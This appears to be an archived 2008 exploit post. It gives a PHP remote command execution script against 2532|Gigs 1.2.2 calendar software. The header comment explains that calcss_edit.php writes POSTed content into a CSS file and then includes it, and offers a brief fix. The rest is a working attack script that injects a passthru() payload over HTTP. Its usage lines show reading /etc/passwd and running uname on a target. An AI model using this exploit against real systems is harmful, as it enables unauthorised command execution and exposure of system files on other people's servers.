2532-exec.txt
Posted on 22 December 2008
<?php /* ---------------------------------------------------------------- * 2532|Gigs 1.2.2 Stable Remote Command Execution Exploit * ---------------------------------------------------------------- * by athos - staker[at]hotmail[dot]it * works regardless php.ini settings * http://www.hotscripts.com/jump.php?listing_id=65863&jump_type=1 * ---------------------------------------------------------------- * Code Details (calcss_edit.php) * * 1. <?php * 2. ... * 12. sleep(2); * 13. $id = $_POST["id"]; * 14. $content = $_POST["content"]; * 15. //lets write the updated CSS file * 16. $filename = "css/calendar.css"; * 17. $theText = stripslashes($content); * 18. $data = fopen($filename, "w"); * 19. fwrite($data,$content); * 20. fclose($data); * 21. // display the new css file * 22. include("css/calendar.css"); * 23 ?> * ---------------------------------------------------------------- * Fix * * <?php * * if(eregi('calcss_edit.php',$_SERVER['PHP-SELF'])) * { * die("Access Not Allowed"); * } * * ... * ?> * */ error_reporting(0); $host = explode('/',$argv[1]); $exec = $argv[2] or usage(); $sock = fsockopen($host[0],80); $post = "content=<?php passthru('{$exec}');?>"; $leng = strlen($post); $data = "POST /{$host[1]}/calcss_edit.php HTTP/1.1 ". "Host: {$host[0]} ". "User-Agent: Lynx (textmode) ". "Content-Type: application/x-www-form-urlencoded ". "Accept-Encoding: text/plain ". "Content-Length: {$leng} {$post} "; fputs($sock,$data); while(!feof($sock)) { $html .= fgets($sock); } fclose($sock); echo $html; function usage() { print_r(' ------------------------------------------------------- 2532|Gigs 1.2.2 Stable Remote Command Execution Exploit ------------------------------------------------------- by athos - staker[at]hotmail[dot]it works regardless php.ini settings Usage: php xpl.php [host/path] [command] php xpl.php localhost/cms cat ../../../etc/passwd php xpl.php localhost/cms "uname -a" '); exit(0); } ?>
